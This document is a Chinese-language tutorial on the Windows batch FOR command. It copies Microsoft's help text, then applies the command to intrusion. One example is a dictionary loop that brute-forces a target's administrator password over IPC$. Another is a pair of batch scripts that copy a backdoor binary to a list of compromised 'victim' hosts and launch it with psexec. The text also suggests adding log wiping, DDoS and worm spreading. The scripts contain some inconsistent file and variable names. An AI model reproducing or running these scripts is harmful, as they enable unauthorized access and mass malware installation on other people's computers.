BAT文件常用代码（2）

如果命令扩展名被启用，下列额外的 FOR 命令格式会受到 
支持: 

FOR /D %variable IN (set) DO command [command-parameters] 

如果集中包含通配符，则指定与目录名匹配，而不与文件 
名匹配。 

FOR /R [[drive:]path] %variable IN (set) DO command [command- 

检查以 [drive:]path 为根的目录树，指向每个目录中的 
FOR 语句。如果在 /R 后没有指定目录，则使用当前 
目录。如果集仅为一个单点(.)字符，则枚举该目录树。 

FOR /L %variable IN (start,step,end) DO command [command-para 

该集表示以增量形式从开始到结束的一个数字序列。 
因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生 
序列 (5 4 3 2 1)。 

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN (command) DO command 

或者，如果有 usebackq 选项: 

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN (command) DO command 

filenameset 为一个或多个文件名。继续到 filenameset 中的 
下一个文件之前，每份文件都已被打开、读取并经过处理。 
处理包括读取文件，将其分成一行行的文字，然后将每行 
解析成零或更多的符号。然后用已找到的符号字符串变量值 
调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开 
的第一个空白符号。跳过空白行。您可通过指定可选 "options" 
参数替代默认解析操作。这个带引号的字符串包括一个或多个 
指定不同解析选项的关键字。这些关键字为: 

eol=c - 指一个行注释字符的结尾(就一个) 
skip=n - 指在文件开始时忽略的行数。 
delims=xxx - 指分隔符集。这个替换了空格和跳格键的 
默认分隔符集。 
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 
的 for 本身。这会导致额外变量名称的 
格式为一个范围。通过 nth 符号指定 m 
符号字符串中的最后一个字符星号， 
那么额外的变量将在最后一个符号解析之 
分配并接受行的保留文本。 
usebackq - 指定新语法已在下类情况中使用: 
在作为命令执行一个后引号的字符串并且 
引号字符为文字字符串命令并允许在 fi 
中使用双引号扩起文件名称。 

sample1: 
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 

会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用 %j 来取得第三个符号，引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名，您需要用双引号将文件名括起来。为了用这种方式来使 用双引号，您还需要使用 usebackq 选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。 

%i 专门在 for 语句中得到说明，%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号，只要不试图说明一个高于字母 z 或 Z 的变量。请记住，FOR 变量是单一字母、分大小写和全局的； 同时不能有 52 个以上都在使用中。 

您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是， 用单引号将括号之间的 filenameset 括起来。这样，该字符 串会被当作一个文件中的一个单一输入行。 

最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进 
存，并被当作文件分析。因此，以下例子: 

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 

会枚举当前环境中的环境变量名称。 

另外，FOR 变量参照的替换已被增强。您现在可以使用下列 
选项语法: 

~I - 删除任何引号(")，扩充 %I 
%~fI - 将 %I 扩充到一个完全合格的路径名 
%~dI - 仅将 %I 扩充到一个驱动器号 
%~pI - 仅将 %I 扩充到一个路径 
%~nI - 仅将 %I 扩充到一个文件名 
%~xI - 仅将 %I 扩充到一个文件扩展名 
%~sI - 扩充的路径只含有短名 
%~aI - 将 %I 扩充到文件的文件属性 
%~tI - 将 %I 扩充到文件的日期/时间 
%~zI - 将 %I 扩充到文件的大小 
%~$PATH:I - 查找列在路径环境变量的目录，并将 %I 扩充 
到找到的第一个完全合格的名称。如果环境变量 
未被定义，或者没有找到文件，此组合键会扩充 
空字符串 

可以组合修饰符来得到多重结果: 

%~dpI - 仅将 %I 扩充到一个驱动器号和路径 
%~nxI - 仅将 %I 扩充到一个文件名和扩展名 
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 
%~dp$PATH:i - 查找列在路径环境变量的目录，并将 %I 扩充 
到找到的第一个驱动器号和路径。 
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR 

在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法 
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 
比较易读，而且避免与不分大小写的组合键混淆。 

以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。 

sample2： 

利用For命令来实现对一台目标Win2k主机的暴力密码破解。 
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接，当成功时记下密码。 
最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator" 
用i%来表示admin的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令－－ 
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ，这样就ko了。 

sample3： 

你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。 

主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable） 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k 
tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 
而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。 
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。 
代码雏形： 

--------------- cut here then save as a batchfile(I call it main.bat ) -------------------- 
@echo off 
@if "%1"=="" goto usage 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k 
@goto end 
:usage 
@echo run this batch in dos modle.or just double-click it. 
:end 
--------------- cut here then save as a batchfile(I call it main.bat ) -------------------- 

------------------- cut here then save as a batchfile(I call it door.bat) ----------------- 
@net use \\%1\ipc$ %3 /u:"%2" 
@if errorlevel 1 goto failed 
@echo Trying to establish the IPC$ connection …………OK 
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt 
@p***ec \\%1 c:\winnt\system32\windrv32.exe 
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt 
:failed 
@echo Sorry can not connected to the victim. 
----------------- cut here then save as a batchfile(I call it door.bat) ------------------- 
这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一目录下.批处理内容 
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,

下面是DOS下的常用命令 
cd 改变当前目录 sys 制作DOS系统盘 

copy 拷贝文件 del 删除文件 

deltree 删除目录树 dir 列文件名 

diskcopy 制磁盘 edit 文本编辑 

format 格式化磁盘 md 建立子目录 

mem 查看内存状况 type 显示文件内容 

rd 删除目录 ren 改变文件名

DOS命令大全 
sfc.exe系统文件检查器 
sfc /scannow-windows文件保护 

tsshutdn-60秒倒计时关机命令 
tourstartxp简介（安装完成后出现的漫游xp程序） 
taskmgr任务管理器 

eventvwr-事件查看器 
eudcedit-造字程序 
explorer-打开资源管理器 

packager-对象包装程序 
perfmon.msc计算机性能监测程序 
progman程序管理器 

regedit.exe注册表 
rsop.msc-组策略结果集 
regedt32-注册表编辑器 
rononce -p 15秒关机 
regsvr32 /u *.dll停止dll文件运行 
regsvr32 /u zipfldr.dll取消ZIP支持 

cmd.exeCMD命令提示符 
chkdsk.exe-Chkdsk磁盘检查 
certmgr.msc证书管理实用程序 
calc-启动计算器 
charmap启动字符映射表 
cliconfg-SQL SERVER 客户端网络实用程序 
Clipbrd剪贴板查看器 
conf-启动netmeeting 
compmgmt.msc-计算机管理 
cleanmgr-垃圾整理 
ciadv.msc索引服务程序 

osk打开屏幕键盘 
odbcad32-ODBC数据源管理器 
oobe/msoobe /a检查XP是否激活 
lusrmgr.msc本机用户和组 
logoff-注销命令 

iexpress-木马捆绑工具，系统自带 

Nslookup-IP地址侦测器 

fsmgmt.msc-共享文件夹管理器 

utilman辅助工具管理器 

gpedit.msc-组策略